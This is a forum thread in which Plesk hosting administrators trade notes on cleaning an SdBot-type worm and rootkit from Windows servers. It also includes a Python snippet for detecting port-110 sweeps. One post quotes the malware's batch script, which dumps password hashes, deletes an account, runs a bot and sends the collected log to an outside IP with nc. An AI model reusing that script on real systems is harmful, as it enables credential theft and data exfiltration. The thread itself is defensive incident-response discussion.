
plesk login page problem

My McAfee scan found this in the IE temp folder. I never use IE, only Firefox.

C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP2FOLA3\_iNDEX[1].exe\PACK.EXE\NW.DLL ... Found trojan or variant Generic.dp !!!

Like everyone, my sites are all down. I did find and delete the a.exe, but the rdriv.sys is still popping up after being deleted. Has anyone identified the process restoring this and the registry keys associated with it?
 
Some more info for everyone...

We have been able to get rdriv.sys removed and it does not reappear. Disabling all MailEnable services seems to prevent rdriv.sys from coming back after a deletion and reboot.

However, in that state the machine will reboot itself after you login to the console or after a short uptime.

This is so frustrating...

Jim
Bocacom
 
update from swsoft

I think Plesk officials need to seriously look into this problem, as I am sure many people will have been affected by it and will come to this forum while searching for help. SWsoft people, please hear us and come up with a solution. At least respond saying that you will come up with a patch or update at a particular time, so that we can wait and inform our customers, who are going mad having taken our hosting service.

I am sure all the people suffering from this problem like me will back me in asking Plesk to come up with a time frame for a solution soon.
 
any updates

Has any other user facing this problem been able to get out of it? Please advise so that we can also apply the same settings and get our websites live again; they have been down for so many hours. God knows when the SWsoft team will respond.
 
Message for TarkanVeKurdu

Did you find any solution that works on your servers?
 
What to say...
SWsoft will carry my soul on their conscience...
I had a lot of unpleasant calls from customers throughout the day...
Not sure that any fix will help me, as I tried a lot of fixes regarding this issue and I'm not sure if I spoiled something else on the way. I blame SWsoft for not responding for hours to say that this is a global problem.
If I had known that, I wouldn't have TOUCHED anything!!!

:mad:
 
I am very sorry, I thought I had solved it but it seems it's not. The psacln user is disappearing from local group policy.

Still the same problem and got exhausted.
 
swsoft update required

I feel the only solution to this problem is that this is some bug which has affected many Plesk installations. Slowly people are coming up here and posting their problems, and I am sure that some time from now there will be many people coming here to share the same issue.

Until and unless Plesk posts the exact solution, in my opinion it's not advisable to change any setting. The setting given was for Plesk 8.1 and it is not certain whether it applies to us on 7.6.1.
 
Narrowing in.....

I've identified several elements that I think are at the cause of this.

Here is a bat file that I think installed most of it:

cd %WINDIR%\system32
gethashes.exe $Local>>Status.log
pack.exe
net user aspnet /delete /y>>status.log
bw.exe>>status.log
net localgroup Administrators >>status.log
del hash.bat
psinfo -d >>status.log
ipconfig/all>>status.log
bot.exe
type status.log|nc 209.196.36.78 53
start cmd /c del status.log
start cmd /c del pack.exe
start cmd /c del unrar.exe
start cmd /c del fix.bat
start cmd /c del _iNDEX.exe

Some of these files were in my IE temporary internet files, which I mentioned before.

Some of the key files to remove are:

c:\windows\system32\clipsvr.exe (not clipsrv.exe!!)
c:\windows\system32\rdriv.sys
c:\windows\system32\a.exe
c:\windows\config\config.exe

After removing these I can then add the psacln user to the User Rights Assignment in Local Policies mentioned earlier in the post (if you are lost please read the post in its entirety to catch up).

So after all this my sites are working, but I am afraid to reboot. I've searched for and removed all registry entries for the above files except one: clipsvr.exe. I am unable to remove it. I get this from regedit: cannot edit imagepath.

Does anyone know how I can modify that entry in the registry?

I hope this helps some of you to get your sites back up.

Good luck! and no thanks to the people at SWSoft. Anyone want to buy a Plesk license? I am dumping this piece of S**T software and the crappy support they offer. Nothing but headaches since I got it!!
 
@ecohosting

Were you able to get subdomains back online, such as webmail.domain.com? websrvmng doesn't seem to like those.
 
Last Week

I had a problem last week with a virus infecting Plesk, but Dr.Web caught it after a scan on the server and eliminated it (I thought). Starting to think that the problem is related.
 
Unfortunately I can't tell you as I don't have any subdomains setup on this server. I bought Plesk to simply host my ASP and .NET customers (about 25 domains). We're a cPanel shop. There is no DNS, no email, no databases running on this server. I use it strictly for IIS and AWStats and it still doesn't run reliably!
 
Originally posted by ecohosting
Unfortunately I can't tell you as I don't have any subdomains setup on this server. I bought Plesk to simply host my ASP and .NET customers (about 25 domains). We're a cPanel shop. There is no DNS, no email, no databases running on this server. I use it strictly for IIS and AWStats and it still doesn't run reliably!

Do you have the mail server disabled? I heard that doing so will prevent the threat from recurring.
 
SteveDude: I have my mail server (MailEnable Enterprise 2.35) enabled, and my sites are working now, per the instructions I posted earlier in the thread. However, all of my subdomains are still showing the same problem.
 
update on the file clipsvr.exe...

Just found this about clipsvr.exe. You should search for and remove the following files if you find them. Here is where I got it: http://research.sunbelt-software.com/threatdisplay.aspx?name=Backdoor.SdBot.aad&threatid=42825

Alias Backdoor.Win32.SdBot.aad, Backdoor.SdBot.aad
 
Originally posted by SteveDude
Do you have the mail server disabled? I heard that doing so will prevent the threat from recurring.

Yes, I did have it disabled. This is really curious, as some people are saying it is MailEnable related, some are saying it is an actual Plesk update, and I found the trojan install files in my IE temp folder (I never use IE).

In the end I found the files manually, removed them and cleaned out the registry as much as I can. Now I have to reboot and cross my fingers!! Pray for me...
 
Some Thoughts

Greetings:

I just thought I would post some things we are seeing. It does appear to be related to the MailEnable issue that SWsoft has warned about. Additionally, the worm appears to be spreading autonomously (like most worms do).

What we are seeing is infected machines starting to make a large number of connections to other machines, starting on the same subnet of IP space, to port 110. Additionally, we are seeing hung connections from infected machines to newly infected machines on port 110.

Lastly, the best information we have on hand at the moment indicates that the rootkit installed is Trojan.NTRootKit.61. We have not tested a cleaning protocol as of yet but will do so once we identify a process that works well.

Regardless, if you manage to clean your installation, I recommend upgrading ME as directed by SWsoft, or add ACLs to the environment to block inbound port 110 traffic until you can get it patched.

Good luck, and we'll post anything we learn along the way.

Regards,

Steve
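As an added illustration of the port-110 sweep Steve describes (example code written for this page, not code from the thread, from Plesk or from SWsoft), this Python snippet parses a constructed sample of `netstat -an` output and flags a local address that has many outbound POP3 connections, most of them to its own /24 and many stuck in SYN_SENT. The threshold, the sample lines and the IP addresses are assumptions chosen for the example.

```python
"""Flag hosts whose netstat output shows a port-110 (POP3) sweep."""
import ipaddress
import re
from collections import defaultdict

# TCP lines of Windows `netstat -an`: proto, local addr, remote addr, state.
NETSTAT_RE = re.compile(r"^\s*TCP\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+(?P<state>\S+)\s*$")

def parse_netstat(lines):
    """Yield (local_ip, remote_ip, remote_port, state) for each TCP line."""
    for line in lines:
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        local_ip, _ = m.group("local").rsplit(":", 1)
        remote_ip, remote_port = m.group("remote").rsplit(":", 1)
        if remote_port.isdigit():
            yield local_ip, remote_ip, int(remote_port), m.group("state")

def pop3_sweep_report(lines, threshold=5):
    """Per local IP: distinct port-110 peers, how many share its /24, how many
    connections are stuck in SYN_SENT, and whether the peer count hits `threshold`."""
    peers, syn_sent = defaultdict(set), defaultdict(int)
    for local_ip, remote_ip, port, state in parse_netstat(lines):
        if port != 110:
            continue
        peers[local_ip].add(remote_ip)
        if state == "SYN_SENT":
            syn_sent[local_ip] += 1
    report = {}
    for local_ip, remotes in peers.items():
        net = ipaddress.ip_network(local_ip + "/24", strict=False)
        same_subnet = sum(ipaddress.ip_address(r) in net for r in remotes)
        report[local_ip] = {"peers": len(remotes), "same_subnet": same_subnet,
                            "syn_sent": syn_sent[local_ip],
                            "flagged": len(remotes) >= threshold}
    return report

# Constructed sample of `netstat -an` output (documentation-range IPs, not real data).
SAMPLE = """\
TCP    192.0.2.10:1035     192.0.2.11:110      SYN_SENT
TCP    192.0.2.10:1036     192.0.2.12:110      SYN_SENT
TCP    192.0.2.10:1037     192.0.2.13:110      ESTABLISHED
TCP    192.0.2.10:1038     192.0.2.14:110      SYN_SENT
TCP    192.0.2.10:1039     192.0.2.15:110      SYN_SENT
TCP    192.0.2.10:1040     198.51.100.7:110    SYN_SENT
TCP    192.0.2.10:3389     203.0.113.5:51234   ESTABLISHED
UDP    0.0.0.0:53          *:*
""".splitlines()
```

Feed it the real output of `netstat -an` on a suspect box; a local address with a high peer count, mostly inside its own /24 and mostly in SYN_SENT, matches the pattern described above and is a candidate for isolation and cleanup.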
 
Re: Some Thoughts

Originally posted by smerkel
Greetings:

I just thought I would post in some things we are seeing. It does appear to be related to the MailEnable issue that SWSoft has warned about.
Where did we get this warning?
I don't believe I got any such message. Do you have a link?
 